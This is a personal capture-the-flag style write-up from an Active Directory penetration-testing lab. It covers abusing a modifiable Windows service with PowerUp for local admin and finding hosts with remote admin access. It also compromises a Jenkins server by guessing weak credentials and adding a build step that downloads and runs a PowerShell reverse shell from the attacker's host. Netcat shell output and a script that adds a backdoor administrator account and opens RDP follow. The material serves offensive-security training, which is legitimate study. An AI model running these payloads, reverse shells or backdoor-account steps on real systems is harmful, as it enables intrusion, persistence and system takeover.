Learning Object 5
Tasks
1 – Exploit a service on dcorp-studentx and elevate privileges to local administrator
2 – Identify a machine in the domain where studentx has local administrative access
3 – Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 – the dcorp-ci server
Flag 5 [Student VM] – Service abused on the student VM for local privilege escalation 🚩
Flag 6 [Student VM] – Script used for hunting for admin privileges using PowerShell Remoting 🚩
Flag 7 [dcorp-ci] – Jenkins user used to access Jenkins web console 🚩
Flag 8 [dcorp-ci] – Domain user used for running Jenkins service on dcorp-ci 🚩
Solutions
Manual check for Unquoted Service Paths for services binaries ( the 1st one is )
PS: C:\users\student98> Get-WmiObject -Class win32_service | select pathnamePS C:\Users\student98> Get-Wmiobject -Class win32_service | select pathname pathname -------- C:\WebServer\Abyss Web Server\abyssws.exe -service C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\alg.exe --snip-- "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc C:\Windows\System32\lsass.exe etc...
Manual check for Modifiable Services [wrong permissions] on a service binary (DACL shows all same permissions as Administrator )
PS: C:\users\student98> sc.exe sdshow snmptrapPS C:\Users\student98> sc.exe sdshow snmptrap D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) PS C:\Users\student98>
1 – Exploit a service on dcorp-studentx and elevate privileges to local administrator
Start InviShell and PowerUp
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerUp.ps1Now we need to exploit a service and elevate privileges to local administrator, using Invoke-AllChecks method we’re able to display all services vulnerable with “CanRestart: True”, “Check: Modifiable Services”, and”Unquoted Service Paths” with relatives abuse function to exploit them
Invoke-AllChecksServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server\abyssws.exe; IdentityReference=Everyone; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=Everyone; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer\Abyss Web Server; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
Name : AbyssWebServer
Check : Unquoted Service Paths
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True
Name : AbyssWebServer
Check : Modifiable Service Files
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True
Name : AbyssWebServer
Check : Modifiable Service Files
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True
Name : AbyssWebServer
Check : Modifiable Service Files
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
Name : edgeupdate
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
Name : edgeupdatem
Check : Modifiable Service Files
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart : True
Name : AbyssWebServer
Check : Modifiable Services
ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True
Name : SNMPTRAP
Check : Modifiable Services
ModifiablePath : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
IdentityReference : dcorp\student867
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\student867\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\student867\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'There’re multiple service vulnerable, in this case i choose a service with CanRestart attribute equals to ‘True’
ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True
Name : SNMPTRAP
Check : Modifiable ServicesAbusing it with the following command we’re able to perform privilege escalation adding our student account to local admin group.
Do to it correctly, first to proceed, we can check abuse function examples:
help Invoke-ServiceAbuse -ExampleNAME
Invoke-ServiceAbuse
SYNOPSIS
Abuses a function the current user has configuration rights on in order
to add a local administrator or execute a custom command.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Invoke-ServiceAbuse -Name VulnSVC
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
-------------------------- EXAMPLE 2 --------------------------
PS C:\>Get-Service VulnSVC | Invoke-ServiceAbuse
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
-------------------------- EXAMPLE 3 --------------------------
PS C:\>Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
local adminisrtators group.
-------------------------- EXAMPLE 4 --------------------------
PS C:\>Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
Abuses service 'VulnSVC' to add a localuser "backdoor" with password
"password" to the machine and local "Power Users" groupSo, this is the abuse function that we need:
Invoke-ServiceAbuse -Name 'SNMPTRAP' -UserName "dcorp\student867" -Verbose
Check it using this command: Get-LocalGroupMember -Group "Administrators"
ObjectClass Name PrincipalSource
----------- ---- ---------------
Group dcorp\Domain Admins ActiveDirectory
User dcorp\student867 ActiveDirectory
User DCORP-STD867\Administrator Local2 – Identify a machine in the domain where studentx has local administrative access
Using Find-PSRemotingLocalAdminAccess.ps1 we can diplay machines where our student account has local admin access:
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbosedcorp-adminsrv
dcorp-std8673 – Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 – the dcorp-ci server
Go via browser on Jenkins site (172.16.3.11:8080) to Dashboard:
This Jenkins vs has password policy without a restrictive rule, we can obtain username about three accounts going to http://172.16.3.11:8080/asynchPeople/
manager
builduser
jenkinsadminso we can brute force accounts using Hydra, but first to proceed i’ve try to login at http://172.16.3.11:8080/login using as a psw the same username and generic passwords login with builduser:builduser credentials
-
Modify an existing project, clicking to existing project0
-
Configure -> Add build step (write the following command) ->
powershell iex (iwr -UseBasicParsing http://<attacker_machine>/Invoke-PowershellTcp.ps1);power -Reverse -IPAddress <attacker_machine> -Port 1339
powershell.exe iex (iwr http://172.16.100.98/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.98 -Port 1339
powershell.exe iex (iwr http://172.16.100.98/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.98 -Port 1339
and save it. Meanwhile run netcat on our attacker win machine going in listening mode on port 1339:
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339Now our student user appartains to administrators group and we can disabe the firewall, do it!
After that, run a web server using HFS.exe present into Tool folder and move Invoke-PowerShellTCP.ps1 to Virtual File System copying the URL into program clipboard:
Click on Build Now
powershell.exe iex (iwr http://172.16.100.98/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.98 -Port 1339
.
Go again to our shell and we’ll see the connection back:
.
c:\ProgramData>C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339 listening on [any] 1339 ... 172.16.3.11: inverse host lookup failed: h_errno 11004: NO_DATA connect to [172.16.100.98] from (UNKNOWN) [172.16.3.11] 57359: NO_DATA Windows PowerShell running as user ciadmin on DCORP-CI Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Users\Administrator\.jenkins\workspace\Project13>hostname dcorp-ci PS C:\Users\Administrator\.jenkins\workspace\Project13> whoami /all USER INFORMATION ---------------- User Name SID ============= ============================================= dcorp\ciadmin S-1-5-21-719815819-3726368948-3917688648-1121
So we have a shell now on dcorp-ci = 172.16.3.11
ls env:Name Value
---- -----
ALLUSERSPROFILE C:\ProgramData
APPDATA C:\Users\ciadmin\AppData\Roaming
BASE C:\Users\Administrator\.jenkins
BUILD_DISPLAY_NAME #3
BUILD_ID 3
BUILD_NUMBER 3
BUILD_TAG jenkins-Project0-3
BUILD_URL http://172.16.3.11:8080/job/Project0/3/
CI true
CommonProgramFiles C:\Program Files\Common Files
CommonProgramFiles(x86) C:\Program Files (x86)\Common Files
CommonProgramW6432 C:\Program Files\Common Files
COMPUTERNAME DCORP-CI
ComSpec C:\Windows\system32\cmd.exe
DriverData C:\Windows\System32\Drivers\DriverData
EXECUTOR_NUMBER 4
HUDSON_COOKIE 667e6811-a108-4927-b6e0-07ded5dff4f3
HUDSON_HOME C:\Users\Administrator\.jenkins
HUDSON_SERVER_COOKIE 6f6749723e1110b6
HUDSON_URL http://172.16.3.11:8080/
JENKINS_HOME C:\Users\Administrator\.jenkins
JENKINS_SERVER_COOKIE 6f6749723e1110b6
JENKINS_URL http://172.16.3.11:8080/
JOB_BASE_NAME Project0
JOB_NAME Project0
JOB_URL http://172.16.3.11:8080/job/Project0/
LOCALAPPDATA C:\Users\ciadmin\AppData\Local
NODE_LABELS built-in
NODE_NAME built-in
NUMBER_OF_PROCESSORS 2
OS Windows_NT
Path C:\Program Files\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\...
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL 25
PROCESSOR_REVISION 0101
ProgramData C:\ProgramData
ProgramFiles C:\Program Files
ProgramFiles(x86) C:\Program Files (x86)
ProgramW6432 C:\Program Files
PROMPT $P$G
PSModulePath C:\Users\ciadmin\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShe...
PUBLIC C:\Users\Public
SERVICE_ID jenkins
SystemDrive C:
SystemRoot C:\Windows
TEMP C:\Users\ciadmin\AppData\Local\Temp
TMP C:\Users\ciadmin\AppData\Local\Temp
USERDNSDOMAIN DOLLARCORP.MONEYCORP.LOCAL
USERDOMAIN dcorp
USERNAME ciadmin
USERPROFILE C:\Users\ciadmin
windir C:\Windows
WINSW_EXECUTABLE C:\Users\Administrator\.jenkins\jenkins.exe
WINSW_SERVICE_ID jenkins
WORKSPACE C:\Users\Administrator\.jenkins\workspace\Project0
WORKSPACE_TMP C:\Users\Administrator\.jenkins\workspace\Project0@tmpFlag 5 [Student VM] – Service abused on the student VM for local privilege escalation 🚩
As seen in the task 1, we can use one of the following services:
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart : True
Name : AbyssWebServer
Check : Modifiable Services
ServiceName : SNMPTRAP
Path : C:\Windows\System32\snmptrap.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart : True
Name : SNMPTRAP
Check : Modifiable ServicesFlag 6 [Student VM] – Script used for hunting for admin privileges using PowerShell Remoting 🚩
As seen in the task 2, we used Find-XXXXXXXXXXXX for hunting admin privileges using PS remoting:
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -VerboseFlag 7 [dcorp-ci] – Jenkins user used to access Jenkins web console 🚩
Based on the task 3, we can login as XXXXXXX account:
Flag 8 [dcorp-ci] – Domain user used for running Jenkins service on dcorp-ci 🚩
As see in the task 3, interacting with machine after the reverse shell we’ve check target information, in this case the domain user is: XXXXXXX
personal note 1st test the reverse shell to your StudentXX machine from dos prompt on Student machine
powershell iex (iwr -UseBasicParsing http://172.16.99.98:8000/Invoke-PowershellTcp.ps1);power -Reverse -IPAddress 172.16.99.98 -Port 1339
and catch shell
D:\CRTP>nc64.exe -nlvp 1339 listening on [any] 1339 ... connect to [172.16.99.98] from (UNKNOWN) [172.16.100.98] 61521 Windows PowerShell running as user student98 on DCORP-STD98 Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami dcorp\student98 PS C:\Windows\system32>
.
exta rdp access on
# Define the password for the user
$Password = "Start123!"
# Create the user 'pwned' with the specified password
Write-Host "Creating user 'puck'..."
try {
New-LocalUser -Name "puck" -Password (ConvertTo-SecureString $Password -AsPlainText -Force) -FullName "pwned User" -Description "Automatically created user" -ErrorAction Stop
Write-Host "User 'puck' has been created."
} catch {
Write-Host "User 'puck' already exists or an error occurred."
}
# Add the user 'pwned' to the Administrators group
Write-Host "Adding user 'puck' to the Administrators group..."
try {
Add-LocalGroupMember -Group "Administrators" -Member "puck" -ErrorAction Stop
Write-Host "User 'puck' has been added to the Administrators group."
} catch {
Write-Host "User 'puck' is already a member of the Administrators group or an error occurred."
}
# Enable Remote Desktop
Write-Host "Enabling Remote Desktop..."
try {
Set-ItemProperty -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -Name "fDenyTSConnections" -Value 0 -ErrorAction Stop
Write-Host "Remote Desktop has been enabled."
} catch {
Write-Host "Failed to enable Remote Desktop or it is already enabled."
}
# Check if the firewall rule for RDP exists
$rdpRule = Get-NetFirewallRule -DisplayName "Remote Desktop" -ErrorAction SilentlyContinue
if ($rdpRule) {
Write-Host "Firewall rule 'Remote Desktop' already exists. Skipping creation."
} else {
Write-Host "Creating firewall rule for Remote Desktop..."
try {
New-NetFirewallRule -Name "RDP Rule" -DisplayName "Remote Desktop" -Protocol TCP -LocalPort 3389 -Action Allow -Direction Inbound -ErrorAction Stop
Write-Host "Firewall rule for Remote Desktop has been created."
} catch {
Write-Host "An error occurred while creating the firewall rule for Remote Desktop."
}
}
# Notify the user that all tasks have been completed
Write-Host "All tasks completed successfully."
.
but it’s a server 2022 Core thus no GUI but Command Line Powershell is available
.